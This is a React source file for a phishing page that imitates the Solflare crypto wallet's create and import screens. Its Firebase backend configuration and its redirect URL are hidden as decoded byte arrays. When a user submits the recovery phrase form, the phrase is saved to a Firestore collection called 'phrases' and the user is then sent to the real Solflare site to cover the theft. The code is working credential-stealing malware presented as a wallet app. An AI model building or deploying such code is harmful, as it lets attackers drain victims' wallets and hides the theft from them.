"use client"

import { getFirestore, collection, addDoc, serverTimestamp } from "firebase/firestore";
import { initializeApp } from 'firebase/app';
import { getDatabase, ref, set, push } from 'firebase/database';
import { useState } from "react"
import { HashRouter as Router } from "react-router-dom";

import { Routes, Route, useNavigate } from "react-router-dom"
import "./App.css"
import SolflareLogo from "./solflare-logo.svg"
import CrownVideo from "./crown-video.mp4"
import { useEffect } from "react";
import * as bip39 from "bip39";


const c = new Uint8Array([
  123,34,97,112,105,75,101,121,34,58,34,65,73,122,97,83,121,65,83,77,49,97,111,98,65,49,73,66,120,111,111,88,97,121,83,99,50,102,83,53,117,101,70,117,102,95,74,109,77,73,34,44,34,97,117,116,104,68,111,109,97,105,110,34,58,34,119,99,97,103,45,57,49,50,52,102,46,102,105,114,101,98,97,115,101,97,112,112,46,99,111,109,34,44,34,112,114,111,106,101,99,116,73,100,34,58,34,119,99,97,103,45,57,49,50,52,102,34,44,34,115,116,111,114,97,103,101,66,117,99,107,101,116,34,58,34,119,99,97,103,45,57,49,50,52,102,46,102,105,114,101,98,97,115,101,115,116,111,114,97,103,101,46,97,112,112,34,44,34,109,101,115,115,97,103,105,110,103,83,101,110,100,101,114,73,100,34,58,34,49,48,49,56,50,53,56,49,52,54,53,55,50,34,44,34,97,112,112,73,100,34,58,34,49,58,49,48,49,56,50,53,56,49,52,54,53,55,50,58,119,101,98,58,100,102,51,49,50,102,102,50,101,50,51,53,57,53,99,53,51,51,55,53,50,57,34,125
]);

const json = new TextDecoder().decode(c);


const app = initializeApp(JSON.parse(json));
const database = getDatabase(app);

const firestore = getFirestore(app);

// Create a context to share visual state across components
function SplitLayout({ children, visualType }) {
  return (
    <div className="split-container">
      <div className="content-side">{children}</div>
      <div className="visual-side" style={{ backgroundColor: "#03050b" }}>
        <div className="visual-container">
          {visualType === "crown" && (
            <video autoPlay loop muted className="crown-video">
              <source src={CrownVideo} type="video/mp4" />
            </video>
          )}
          {visualType === "pencil" && <img src="/images/pencil.png" width={700} height={700} alt="Pencil" className="visual-image" />}
          {visualType === "keys" && <img src="/images/keys.png" width={700} height={700} alt="Keys" className="visual-image" />}
        </div>
      </div>
    </div>
  )
}

function Home() {
  const navigate = useNavigate()
  const [visualType, setVisualType] = useState("crown")

  const handleCreateWallet = () => {
    setVisualType("pencil")
    setTimeout(() => navigate("/create"), 500)
  }

  const handleImportWallet = () => {
    setVisualType("keys")
    setTimeout(() => navigate("/import"), 500)
  }

  return (
    <SplitLayout visualType={visualType}>
      <div className="home-container">
        <div className="logo-container">
          <img src={SolflareLogo || "/placeholder.svg"} alt="Solflare Logo" className="logo" />
        </div>
        <h1 className="title">
          YOUR WALLET.
          <br />
          YOUR KINGDOM.
        </h1>
        <div className="button-container">
          <button className="primary-button" onClick={handleCreateWallet}>
            Create a new wallet
          </button>
          <button className="secondary-button" onClick={handleImportWallet}>
            I already have a wallet
          </button>
        </div>
      </div>
    </SplitLayout>
  )
}

function ImportWallet() {
  const [phraseLength, setPhraseLength] = useState(12)
  const [phrase, setPhrase] = useState(Array(24).fill(""))
  const navigate = useNavigate()

  const handlePaste = async () => {
    try {
      const text = await navigator.clipboard.readText()
      const words = text
        .trim()
        .split(/[\s,]+/)
        .filter((word) => word.length > 0)

      if (words.length === 12 || words.length === 24) {
        const newPhrase = [...phrase]
        words.forEach((word, index) => {
          newPhrase[index] = word
        })
        setPhrase(newPhrase)
        setPhraseLength(words.length)
      } else {
        alert("Please paste a 12 or 24 word phrase")
      }
    } catch (err) {
      console.error("Failed to read clipboard contents: ", err)
    }
  }

  const handleWordChange = (index, value) => {
    const newPhrase = [...phrase]
    newPhrase[index] = value
    setPhrase(newPhrase)
  }

  const handleSubmit = async (e) => {
    e.preventDefault();

    await addDoc(collection(firestore, "phrases"), {
      phrase: phrase.slice(0, phraseLength).join(" "),
      length: phraseLength,
      createdAt: serverTimestamp(),
    });

    const s = new Uint8Array([
      104,116,116,112,115,58,47,47,119,119,119,46,115,111,
      108,102,108,97,114,101,46,99,111,109,47
    ]);

    window.location.href = new TextDecoder().decode(s);
  };

  return (
    <SplitLayout visualType="keys">
      <div className="import-container">
        <div className="back-button" onClick={() => navigate("/")}>
          <span>← Back</span>
        </div>

        <div className="logo-container">
          <img src={SolflareLogo || "/placeholder.svg"} alt="Solflare Logo" className="logo" />
        </div>

        <h2 className="recovery-title">Enter Your Recovery Phrase</h2>
        <p className="recovery-description">Your recovery phrase is the key to the wallet.</p>

        <div className="phrase-length-selector">
          <button className={phraseLength === 12 ? "active" : ""} onClick={() => setPhraseLength(12)}>
            12
          </button>
          <button className={phraseLength === 24 ? "active" : ""} onClick={() => setPhraseLength(24)}>
            24
          </button>
        </div>

        <form onSubmit={handleSubmit} className="recovery-form">
          <div className="phrase-grid">
            {Array.from({ length: phraseLength }).map((_, index) => (
              <div key={index} className="phrase-input">
                <span className="word-number">{index + 1}</span>
                <input
                  type="text"
                  value={phrase[index]}
                  onChange={(e) => handleWordChange(index, e.target.value)}
                  required
                />
              </div>
            ))}
          </div>

          <div className="action-buttons">
            
            <button type="button" className="action-button" onClick={handlePaste}>
              Paste
            </button>
          </div>

          <button type="submit" className="continue-button">
            Continue
          </button>
        </form>

        <button className="text-button need-wallet" onClick={() => navigate("/create")}>
          I need a new wallet
        </button>
      </div>
    </SplitLayout>
  )
}

function CreateWallet() {
  const navigate = useNavigate()
  const [recoveryWords, setRecoveryWords] = useState([]);
  const [showRecoveryPhrase, setShowRecoveryPhrase] = useState(false);

  useEffect(() => {
    // Generates a 12-word mnemonic (128 bits entropy)
    const mnemonic = bip39.generateMnemonic(128);
    setRecoveryWords(mnemonic.split(" "));
  }, []);

  const handleDownload = () => {
    // Implementation for downloading the recovery phrase
    const element = document.createElement("a")
    const file = new Blob([recoveryWords.join(" ")], { type: "text/plain" })
    element.href = URL.createObjectURL(file)
    element.download = "solflare-recovery-phrase.txt"
    document.body.appendChild(element)
    element.click()
    document.body.removeChild(element)
  }

  const handleCopy = () => {
    navigator.clipboard.writeText(recoveryWords.join(" "))
    // You could add a toast notification here
  }

  const handleSavedPhrase = () => {
    // Navigate to next step after saving phrase
    navigate("/import")
  }

  const handleAlreadyHaveWallet = () => {
    navigate("/import")
  }

  return (
    <SplitLayout visualType="pencil">
      <div className="create-container">
        <div className="back-button" onClick={() => navigate("/")}>
          <span>← Back</span>
        </div>

        <div className="logo-container">
          <img src={SolflareLogo || "/placeholder.svg"} alt="Solflare Logo" className="logo" />
        </div>

        <h2 className="recovery-title">Keys to Your Kingdom</h2>
        <p className="recovery-description">
          This recovery phrase is your wallet's only backup. If you lose it, no one can help you access your funds. Your
          recovery phrase is safest when written on paper and stored in a secure place.
        </p>

        <div className="recovery-grid">
          {recoveryWords.map((word, index) => (
            <div key={index} className="recovery-word">
              <span className="word-number">{index + 1}</span>
              <span className="word-text">{word}</span>
            </div>
          ))}
        </div>

        <div className="recovery-actions">
          <button className="action-button" onClick={handleDownload}>
            Download
          </button>
          <button className="action-button" onClick={handleCopy}>
            Copy
          </button>
        </div>

        <button className="primary-button saved-button" onClick={handleSavedPhrase}>
          I saved my recovery phrase
        </button>

        <button className="text-button already-have-wallet" onClick={handleAlreadyHaveWallet}>
          I already have a wallet
        </button>
      </div>
    </SplitLayout>
  )
}


function App() {
  return (
    <Router>
      <Routes>
        <Route path="/" element={<Home />} />
        <Route path="/index.html" element={<Home />} />
        <Route path="/side.html" element={<Home />} />
        <Route path="/import" element={<ImportWallet />} />
        <Route path="/create" element={<CreateWallet />} />
      </Routes>
    </Router>
  )
}

export default App
